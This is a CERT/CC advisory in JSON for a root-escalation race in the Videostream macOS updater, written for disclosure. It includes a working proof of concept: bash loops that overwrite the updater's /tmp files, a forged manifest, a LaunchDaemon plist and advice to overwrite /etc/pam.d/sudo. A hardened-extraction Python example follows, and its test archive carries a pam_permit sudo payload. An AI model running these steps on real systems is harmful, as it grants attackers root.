{"document":{"acknowledgments":[{"urls":["https://kb.cert.org/vuls/id/757109#acknowledgements"]}],"category":"CERT/CC Vulnerability Note","csaf_version":"2.0","notes":[{"category":"summary","text":"### Overview\r\nGroupnotes Inc. Videostream Mac client installs a LaunchDaemon that runs with root privileges. The daemon is vulnerable to a race condition that allows for arbitrary file writes. A low privileged attacker can escalate privileges to root on affected systems.\r\n\r\n### Description\r\nEvery five hours the Videostream LaunchDaemon runs with root privileges to check for updates. During the download, it's possible to replace the update file as any user with a crafted tar archive. The LaunchDaemon process will extract the archive and replace any requested file on the system.\r\n\r\n### Impact\r\nAn attacker with low privilege access can overwrite arbitrary files on the affected system. This can be leveraged to escalate privileges to control the root account.\r\n\r\n### Solution\r\nThe CERT/CC is currently unaware of a practical solution to this problem.\r\n\r\n### Acknowledgements\r\nThank you to Dan Revah for reporting this issue.\r\n\r\nThis document was written by Kevin Stephens.","title":"Summary"},{"category":"legal_disclaimer","text":"THIS DOCUMENT IS PROVIDED ON AN 'AS IS' BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. ","title":"Legal Disclaimer"},{"category":"other","text":"CERT/CC Vulnerability Note is a limited advisory. It primarily identifies vendors impacted by the advisory and not specific products. We only support \"known_affected\" and \"known_not_affected\" status. 
Please consult the vendor's statements and advisory URL if provided by the vendor for more details ","title":"Limitations of Advisory"}],"publisher":{"category":"coordinator","contact_details":"Email: cert@cert.org, Phone: +1412 268 5800","issuing_authority":"CERT/CC under DHS/CISA https://www.cisa.gov/cybersecurity also see https://kb.cert.org/ ","name":"CERT/CC","namespace":"https://kb.cert.org/"},"references":[{"url":"https://certcc.github.io/certcc_disclosure_policy","summary":"CERT/CC vulnerability disclosure policy"},{"summary":"CERT/CC document released","category":"self","url":"https://kb.cert.org/vuls/id/757109"}],"title":"Groupnotes Inc. Videostream Mac client allows for privilege escalation to root account","tracking":{"current_release_date":"2023-08-28T15:15:33+00:00","generator":{"engine":{"name":"VINCE","version":"3.0.35"}},"id":"VU#757109","initial_release_date":"2023-08-28 15:15:33.499649+00:00","revision_history":[{"date":"2023-08-28T15:15:33+00:00","number":"1.20230828151533.1","summary":"Released on 2023-08-28T15:15:33+00:00"}],"status":"final","version":"1.20230828151533.1"}},"vulnerabilities":[{"title":"Description\r\nLocal Privilege Escalation to ROOT - TOCTOU vulnerability in VideoStream for macOS applications.","notes":[{"category":"summary","text":"Description\r\nLocal Privilege Escalation to ROOT - TOCTOU vulnerability in VideoStream for macOS applications. The VideoStream installer registers a \"LaunchDaemon\" (which runs as root on macOS) that attempts to update VideoStream every 5 hours.\r\nExploit\r\nEvery 5 hours the LaunchDaemon updater runs, and a race condition makes it possible to overwrite the downloaded file as the updater writes it to the `/tmp` directory. VideoStream then extracts that file into the root directory \"/\". This means an attacker can overwrite any file as root.\r\n\r\nAn attacker can generate a `tar.gz` archive containing the directory hierarchy and the file(s) they want to add or overwrite.\r\n\r\nOverwriting `/etc/pam.d/sudo` or `/Library/LaunchDaemons/com.example.plist`, for example, yields privilege escalation.\r\n\r\nTo do that, the attacker must overwrite both the `manifest.json` file that is downloaded and the update archive that is installed. Before downloading and installing an update, the installer script fetches \"manifest.json\" and extracts the latest version from it. If that version is greater than the installed one, it then downloads the update file.\r\n\r\nBoth \"manifest.json\" and the downloaded update are written into the `/tmp` directory. By winning the race and running the attacker's script _before_ the updater writes these files into `/tmp` for the first time, the attacker can continuously overwrite them with attacker-controlled content.\r\n\r\n\r\nAs the latest version is 0.5.1, the malicious manifest needs a greater version, for example 0.5.3:\r\n\r\n{\r\nCurrentVersion: '0.5.3',\r\nurl: 'videostream_0.5.0.tar.gz'\r\n}\r\n\r\n\r\nThe `url` must keep the same file name, so that the updater's curl download lands in `/tmp` under the name the attacker is overwriting.\r\n\r\nAnother thing to notice is that the downloaded `manifest.json` is written under a file name equal to the PID of the updater script, which of course changes on each run, so the attacker needs to look up the PID and use it to overwrite the file.\r\n\r\nTo exploit this, the attacker needs to:\r\n1. Create a manifest.json file with the above contents under `/tmp`\r\n2. Use the following script to continuously look up the Videostream updater PID and overwrite the downloaded manifest.json with the malicious manifest.json\r\n```\r\n#!/bin/bash\r\n\r\necho '[+] Overriding manifest.json'\r\n\r\n# Loop until the proof-of-exploit LaunchDaemon plist exists, i.e. until the\r\n# root updater has extracted the attacker's archive into /.\r\nwhile [ ! -f /Library/LaunchDaemons/com.example.proof.plist ]\r\ndo\r\n# Every updater run writes manifest.json to /tmp/<pid>; keep replacing it.\r\npgrep -f Videostream.update | xargs -I {} cp manifest.json /tmp/{}\r\ndone\r\n\r\n```\r\n\r\nThis is the first script that needs to be run as part of the exploit. It loops until `com.example.proof.plist` appears under LaunchDaemons (proof of being able to write files as root).\r\n\r\n3. Create an `escalate.tar.gz` file with the following hierarchy:\r\n- Library\r\n- LaunchDaemons\r\n- com.example.proof.plist\r\n\r\nthat is, a Library directory containing a LaunchDaemons directory, which contains a com.example.proof.plist file.\r\n\r\n4. The com.example.proof.plist file can have:\r\n\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">\r\n<plist version=\"1.0\">\r\n<dict>\r\n<key>Label</key>\r\n<string>com.example.proof</string>\r\n<key>ProgramArguments</key>\r\n<array>\r\n<string>touch</string>\r\n<string>/tmp/proof</string>\r\n</array>\r\n<key>RunAtLoad</key>\r\n<true/>\r\n</dict>\r\n</plist>\r\n\r\nThis will run on next boot and create the /tmp/proof file as root (to avoid needing a reboot, overwrite /etc/pam.d/sudo instead).\r\n\r\n5. With escalate.tar.gz created and the previous script running in the background, also run this script:\r\n\r\n```\r\n#!/bin/bash\r\n\r\necho '[+] Overriding the downloaded files...'\r\n\r\n# Same stop condition as the first script: the plist appears once the root\r\n# updater has extracted escalate.tar.gz into /.\r\nwhile [ ! -f /Library/LaunchDaemons/com.example.proof.plist ]\r\ndo\r\n# Keep replacing the archive the updater downloads to /tmp with ours.\r\ncp escalate.tar.gz /tmp/videostream_0.5.0.tar.gz\r\nsleep 0.01\r\ndone\r\n\r\necho '[+] Done.'\r\n```\r\n\r\nThis script also waits for `com.example.proof.plist` to be created; until then it keeps overwriting /tmp/videostream_0.5.0.tar.gz with the contents of `escalate.tar.gz`, which the updater then extracts under the `/` directory, adding the com.example.proof.plist file.\r\n\r\nAgain, overwriting `/etc/pam.d/sudo` instead gives LPE without rebooting.\r\nImpact\r\nLocal Privilege Escalation from regular user to root\r\nDiscovery\r\n1. Downloading the macOS application from getvideostream.com.\r\n2. Suspicious Package - looking up what's getting installed from the `pkg` installer file.\r\n3. Looking at `/Library/LaunchDaemons/...` and seeing that it installs a LaunchDaemon\r\n4. Looking at the installed script, analyzing it, and finding that it writes to the `/tmp` directory, that we can write there first, and that it is a TOCTOU vulnerability."}],"cve":"CVE-2023-25394","ids":[{"system_name":"CERT/CC V Identifier ","text":"VU#757109"}]}],"product_tree":{"branches":[]}}
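The updater pattern described in the note fails in two ways: it stages the manifest and the archive in the world-writable `/tmp` under predictable names (the updater's PID, a fixed archive name), and it extracts an unverified archive into `/`. The Python below is an added example, not code from the advisory or from Videostream, showing the checks a root-privileged updater should apply instead: stage downloads in a private `mkdtemp` directory, refuse to extract archive members that escape the staging directory, are not plain files or directories, or sit outside one expected top-level directory, and never extract into `/`. The allowed top-level name `Videostream.app` is an assumption for illustration; the page does not describe the real update layout. The archive contents are constructed test data modelled on `escalate.tar.gz`. These checks do not replace verifying a signature on the manifest and archive, which is the other half of a safe updater.

```python
"""Added example: hardened staging and extraction for a root-privileged updater.

Not code from the advisory or from Videostream. The allowed top-level
directory name passed in by the caller (e.g. "Videostream.app") is an
assumption for illustration.
"""
import io
import os
import stat
import tarfile
import tempfile


def make_private_stage_dir() -> str:
    """Create a mode-0700 directory with an unpredictable name.

    Replaces writing to /tmp/<pid> and /tmp/videostream_0.5.0.tar.gz, where
    any local user can pre-create or overwrite the path between the daemon's
    write and its read (the TOCTOU in the advisory).
    """
    return tempfile.mkdtemp(prefix="updater-")


def stage_dir_is_private(path: str) -> bool:
    """True if `path` is owned by this process and not writable by group/others.

    /tmp (mode 1777) fails this check, which is exactly what let the race work.
    """
    st = os.stat(path)
    if st.st_uid != os.geteuid():
        return False
    return not (st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def build_tar(entries: dict) -> bytes:
    """Build a gzip tar in memory (constructed test data, not a real update)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        for name, data in entries.items():
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tf.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def unsafe_members(tar_bytes: bytes, dest: str, allowed_top: str) -> list:
    """Return names of archive members that must not be extracted into `dest`.

    Rejects absolute names, names that resolve outside `dest` (e.g. "../"),
    anything that is not a plain file or directory (symlinks, devices), and
    entries outside the single top-level directory the update may contain.
    """
    dest_real = os.path.realpath(dest)
    bad = []
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:gz") as tf:
        for m in tf.getmembers():
            if not (m.isfile() or m.isdir()):
                bad.append(m.name)
                continue
            # os.path.join discards dest_real when m.name is absolute, so an
            # absolute member resolves outside dest and is caught below.
            target = os.path.realpath(os.path.join(dest_real, m.name))
            if os.path.commonpath([dest_real, target]) != dest_real:
                bad.append(m.name)  # escapes the staging directory
                continue
            top = os.path.normpath(m.name).split(os.sep)[0]
            if top != allowed_top:
                bad.append(m.name)  # e.g. Library/LaunchDaemons/... or etc/pam.d/sudo
    return bad


def extract_update(tar_bytes: bytes, dest: str, allowed_top: str) -> list:
    """Extract into a private staging directory after all checks pass.

    Returns the member names extracted. Never extracts into "/"; the files
    are installed from the staging directory in a separate step.
    """
    if os.path.realpath(dest) == os.sep:
        raise ValueError("refusing to extract into /")
    if not stage_dir_is_private(dest):
        raise PermissionError(f"{dest} is not a private staging directory")
    bad = unsafe_members(tar_bytes, dest, allowed_top)
    if bad:
        raise ValueError(f"refusing archive with unsafe members: {bad}")
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:gz") as tf:
        names = tf.getnames()
        # Python 3.12+ ships an extraction filter enforcing similar rules;
        # use it as a second layer where available.
        kwargs = {"filter": "data"} if hasattr(tarfile, "data_filter") else {}
        tf.extractall(dest, **kwargs)
    return names


if __name__ == "__main__":
    stage = make_private_stage_dir()
    evil = build_tar({
        "Library/LaunchDaemons/com.example.proof.plist": b"<plist/>",
        "../etc/pam.d/sudo": b"auth sufficient pam_permit.so\n",
    })
    print("rejected:", unsafe_members(evil, stage, "Videostream.app"))
    good = build_tar({"Videostream.app/Contents/Info.plist": b"<plist/>"})
    print("extracted:", extract_update(good, stage, "Videostream.app"))
```

Run as root, `stage_dir_is_private("/tmp")` is false because `/tmp` is world-writable, so a daemon that keeps using `/tmp` fails closed rather than racing. The top-level-directory check is what rejects the `Library/LaunchDaemons/...` payload from the note even though it is a relative path: extracting into a private directory makes traversal harmless, but only an allow-list keeps the install step from later copying unexpected files into `/Library`.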